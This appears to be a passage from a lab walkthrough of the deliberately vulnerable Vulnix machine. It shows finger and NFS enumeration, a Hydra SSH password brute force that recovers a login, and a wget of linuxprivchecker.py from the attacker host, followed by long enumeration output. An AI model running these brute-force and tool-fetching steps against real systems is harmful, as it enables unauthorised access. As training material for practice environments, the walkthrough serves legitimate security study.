Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l uucp@192.168.43.4 [192.168.43.4] Login: uucp Name: uucp Directory: /var/spool/uucp Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l www-data@192.168.43.4 [192.168.43.4] Login: www-data Name: www-data Directory: /var/www Shell: /bin/sh Never logged in. No mail. No Plan.
The user "user" may be interesting because it shows that it has a /home directory.
Port 111 check:
Nmap's output shows that on this port a NFS is mounted.
I used showmount to dig in those shares:
[gandosha@GandoPC 192.168.43.4]$ showmount -e 192.168.43.4 Export list for 192.168.43.4: /home/vulnix *
An interesting share is discovered.
Finger output did not help me a lot:
[gandosha@GandoPC mnt]$ finger -l vulnix@192.168.43.4 [192.168.43.4] Login: vulnix Name: Directory: /home/vulnix Shell: /bin/bash Never logged in. No mail. No Plan.
I mounted this share on my local host to see what's in there:
[GandoPC ~]# mkdir -p /mnt/home/vulnix [GandoPC ~]# mount 192.168.43.4:/home/vulnix /mnt/home/vulnix [GandoPC ~]# cd /mnt/home/vulnix bash: cd: /mnt/home/vulnix: Permission denied
Root squashing is enabled, i cant access it.
I had no choice except for brute forcing ssh service using "user" and "vulnix" users.
Gaining SSH access with "user" user:
Brute force attack on "user":
[gandosha@GandoPC 192.168.43.4]$ sudo hydra -l user -P /home/gandosha/Desktop/SecLists/Passwords/Leaked-Databases/rockyou.txt 192.168.43.4 ssh -t 4 [sudo] password for gandosha: Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-16 19:17:37 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task [DATA] attacking ssh://192.168.43.4:22/ [STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344334 to do in 3735:31h, 4 active [STATUS] 61.33 tries/min, 184 tries in 00:03h, 14344214 to do in 3897:54h, 4 active [STATUS] 60.29 tries/min, 422 tries in 00:07h, 14343976 to do in 3965:34h, 4 active [22][ssh] host: 192.168.43.4 login: user password: letmein 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-16 19:26:15
I connected to "user" via ssh and started to enumerate its permissions using linuxprivchecker.py:
[gandosha@GandoPC 192.168.43.4]$ ssh user@192.168.43.4
user@192.168.43.4's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Oct 16 17:04:35 BST 2018
System load: 0.03 Processes: 87
Usage of /: 94.3% of 773MB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.43.4
Swap usage: 0%
=> / is using 94.3% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Tue Oct 16 16:45:42 2018 from 192.168.43.3
user@vulnix:~$ cd /tmp;ls
user@vulnix:/tmp$ wget 192.168.43.3//Tools/linuxprivchecker/linuxprivchecker.py
--2018-10-16 17:05:34-- http://192.168.43.3//Tools/linuxprivchecker/linuxprivchecker.py
Connecting to 192.168.43.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K)
Saving to: `linuxprivchecker.py'
100%[====================================================================================================================================================>] 25,304 --.-K/s in 0s
2018-10-16 17:05:34 (703 MB/s) - `linuxprivchecker.py' saved [25304/25304]
user@vulnix:/tmp$ chmod +x linuxprivchecker.py
user@vulnix:/tmp$ python ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.2.0-29-generic-pae (buildd@roseapple) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012
[+] Hostname
vulnix
[+] Operating System
Ubuntu 12.04.1 LTS \n \l
db db db db db d8b db d888888b db db
88 88 88 88 88 888o 88 `88' `8b d8'
Y8 8P 88 88 88 88V8o 88 88 `8bd8'
`8b d8' 88 88 88 88 V8o88 88 .dPYb.
`8bd8' 88b d88 88booo. 88 V888 .88. .8P Y8.
YP ~Y8888P' Y88888P VP V8P Y888888P YP YP
Release 1.0
This is a deliberately vulnerable image. Do not place within a live environment.
For training purposes only.
www.rebootuser.com
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 08:00:27:af:e3:88
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feaf:e388/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2861221 errors:0 dropped:0 overruns:0 frame:0
TX packets:2446285 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:346478250 (346.4 MB) TX bytes:419583453 (419.5 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:636 errors:0 dropped:0 overruns:0 frame:0
TX packets:636 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:53300 (53.3 KB) TX bytes:53300 (53.3 KB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:41645 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:60141 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36654 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:43602 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:60680 0.0.0.0:* LISTEN -
tcp 0 0 192.168.43.4:758 192.168.43.3:41635 ESTABLISHED -
tcp 0 0 192.168.43.4:2049 192.168.43.3:835 ESTABLISHED -
tcp 0 0 192.168.43.4:22 192.168.43.3:50034 ESTABLISHED -
tcp6 0 0 :::60109 :::* LISTEN -
tcp6 0 0 :::110 :::* LISTEN -
tcp6 0 0 :::143 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::60309 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::54231 :::* LISTEN -
tcp6 0 0 :::59223 :::* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
tcp6 0 0 :::2049 :::* LISTEN -
tcp6 0 0 :::993 :::* LISTEN -
tcp6 0 0 :::995 :::* LISTEN -
tcp6 0 0 :::52518 :::* LISTEN -
udp 0 0 0.0.0.0:54966 0.0.0.0:* -
udp 0 0 127.0.0.1:985 0.0.0.0:* -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 0.0.0.0:46599 0.0.0.0:* -
udp 0 0 0.0.0.0:800 0.0.0.0:* -
udp 0 0 0.0.0.0:50218 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:51815 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:47493 0.0.0.0:* -
udp6 0 0 :::40843 :::* -
udp6 0 0 :::34491 :::* -
udp6 0 0 :::2049 :::* -
udp6 0 0 :::800 :::* -
udp6 0 0 :::38998 :::* -
udp6 0 0 :::53083 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::50036 :::* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.43.0 * 255.255.255.0 U 0 0 0 eth0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
/dev/mapper/vulnix-root on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
/dev/sda1 on /boot type ext2 (rw)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw)
nfsd on /proc/fs/nfsd type nfsd (rw)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#
proc /proc proc nodev,noexec,nosuid 0 0
/dev/mapper/vulnix-root / ext4 errors=remount-ro 0 1
# /boot was on /dev/sda1 during installation
UUID=14f8e0aa-04a1-4976-a52b-73ab33ba1f1f /boot ext2 defaults 0 2
/dev/mapper/vulnix-swap_1 none swap sw 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rwxr-xr-x 1 root root 219 Apr 10 2012 apport
-rwxr-xr-x 1 root root 15399 Jun 15 2012 apt
-rwxr-xr-x 1 root root 314 Mar 30 2012 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 Apr 13 2012 dpkg
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Mar 31 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Apr 9 2012 passwd
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
-rwxr-xr-x 1 root root 214 Aug 9 2012 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rwxr-xr-x 1 root root 730 Dec 31 2011 apt-xapian-index
-rwxr-xr-x 1 root root 907 Mar 31 2012 man-db
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
17:05:51 up 5:14, 1 user, load average: 0.01, 0.12, 2.43
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user pts/0 192.168.43.3 17:04 0.00s 0.22s 0.00s w
[+] Super Users Found:
root
[+] Environment
LESSOPEN=| /usr/bin/lesspipe %s
MAIL=/var/mail/user
SSH_CLIENT=192.168.43.3 50034 22
USER=user
LANGUAGE=en_GB:en
SHLVL=1
HOME=/home/user
OLDPWD=/home/user
SSH_TTY=/dev/pts/0
LOGNAME=user
_=/usr/bin/python
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
LANG=en_GB.UTF-8
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/tmp
SSH_CONNECTION=192.168.43.3 50034 192.168.43.4 22
[+] Root and current user history (depends on privs)
-rw------- 1 user user 5 Oct 16 17:04 /home/user/.bash_history
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
[+] Current User
user
[+] Current User ID
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Oct 16 11:51 /run/shm
drwxrwxrwt 4 root root 80 Oct 16 11:51 /run/lock
drwxrwxrwt 2 root root 4096 Aug 4 2012 /var/tmp
drwxrwsrwt 2 root whoopsie 4096 Sep 2 2012 /var/crash
drwxrwxrwt 2 root root 4096 Oct 16 17:05 /tmp
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
drwxr-s--- 2 root dip 4096 Sep 2 2012 /etc/chatscripts
drwxr-s--- 2 root dip 4096 Sep 2 2012 /etc/ppp/peers
-rwxr-sr-x 1 root shadow 30364 Feb 9 2012 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 96904 Apr 9 2012 /sbin/mount.nfs
drwxrwsr-x 2 root staff 4096 Aug 4 2012 /var/local
drwxr-sr-x 33 man root 4096 Sep 2 2012 /var/cache/man
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ja/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ja/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ja/cat5
drwxr-sr-x 3 man root 4096 Sep 2 2012 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/gl/cat8
drwxr-sr-x 6 man root 4096 Sep 2 2012 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat7
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat1
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fi/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fi/cat8
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/hu/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/hu/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/hu/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat8
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ko/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ko/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ko/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat7
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/it/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/it/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/it/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat4
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_CN/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_CN/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_CN/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ru/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ru/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ru/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat2
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pl/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pl/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pl/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sv/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sv/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sv/cat5
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/fr.UTF-8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.UTF-8/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.UTF-8/cat7
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/es/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/es/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/es/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat3
drwxr-sr-x 6 man root 4096 Sep 2 2012 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat3
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt_BR/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt_BR/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt_BR/cat5
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sl/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sl/cat8
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_TW/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_TW/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_TW/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/nl/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/nl/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/nl/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat6
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/tr/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/tr/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/tr/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/id/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/id/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/id/cat5
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/fr.ISO8859-1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.ISO8859-1/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.ISO8859-1/cat7
drwx--s--- 2 postfix postdrop 4096 Oct 16 11:51 /var/spool/postfix/public
drwxrwsr-x 2 libuuid libuuid 4096 Sep 2 2012 /var/lib/libuuid
drwxrwsrwt 2 root whoopsie 4096 Sep 2 2012 /var/crash
drwxrwsr-x 2 root mail 4096 Sep 2 2012 /var/mail
drwxrwsr-x 7 root staff 4096 Sep 2 2012 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/misc
drwxrwsr-x 6 root staff 4096 Sep 2 2012 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/ca-certificates
drwxrwsr-x 4 root staff 4096 Sep 2 2012 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/lib/python2.7/site-packages
-rwsr-sr-x 1 libuuid libuuid 17976 Mar 30 2012 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 13624 Jul 30 2012 /usr/sbin/postdrop
-r-xr-sr-x 1 root postdrop 13608 Jul 30 2012 /usr/sbin/postqueue
-rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
-rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 316824 Feb 22 2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 248056 Apr 2 2012 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9728 Apr 20 2012 /usr/lib/pt_chown
-rwxr-sr-x 1 root ssh 128416 Apr 2 2012 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 18120 Apr 9 2012 /usr/bin/expiry
-rwxr-sr-x 3 root mail 9684 Oct 18 2011 /usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 9684 Oct 18 2011 /usr/bin/mail-unlock
-rwxr-sr-x 1 root mail 13708 Aug 4 2010 /usr/bin/lockfile
-rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
-rwxr-sr-x 1 root mail 9720 Jan 10 2012 /usr/bin/mutt_dotlock
-rwsr-xr-x 2 root root 69708 Jun 1 2012 /usr/bin/sudo
-rwsr-xr-x 1 root root 30896 Apr 9 2012 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41284 Apr 9 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 40292 Apr 9 2012 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
-rwsr-xr-x 2 root root 69708 Jun 1 2012 /usr/bin/sudoedit
-rwxr-sr-x 1 root mail 13932 Oct 17 2011 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 18036 Mar 30 2012 /usr/bin/wall
-rwxr-sr-x 1 root shadow 45284 Apr 9 2012 /usr/bin/chage
-rwxr-sr-x 1 root tty 9728 Mar 31 2012 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
-rwxr-sr-x 3 root mail 9684 Oct 18 2011 /usr/bin/mail-lock
-rwxr-sr-x 1 root crontab 34776 Jun 19 2012 /usr/bin/crontab
-rwsr-xr-x 1 root root 57956 Apr 9 2012 /usr/bin/gpasswd
-rwxr-sr-x 1 root utmp 365260 Jun 6 2011 /usr/bin/screen
-rwxr-sr-x 1 root mlocate 34432 Aug 17 2011 /usr/bin/mlocate
-rwsr-xr-x 1 root root 31748 Apr 9 2012 /usr/bin/chsh
-rwsr-sr-x 1 root mail 75600 Aug 4 2010 /usr/bin/procmail
-rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
-rwsr-xr-x 1 root root 88760 Mar 30 2012 /bin/mount
-rwsr-xr-x 1 root root 67720 Mar 30 2012 /bin/umount
-rwsr-xr-x 1 root root 31116 Apr 9 2012 /bin/su
-rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
-rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ltrace.conf:; pwd.h
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
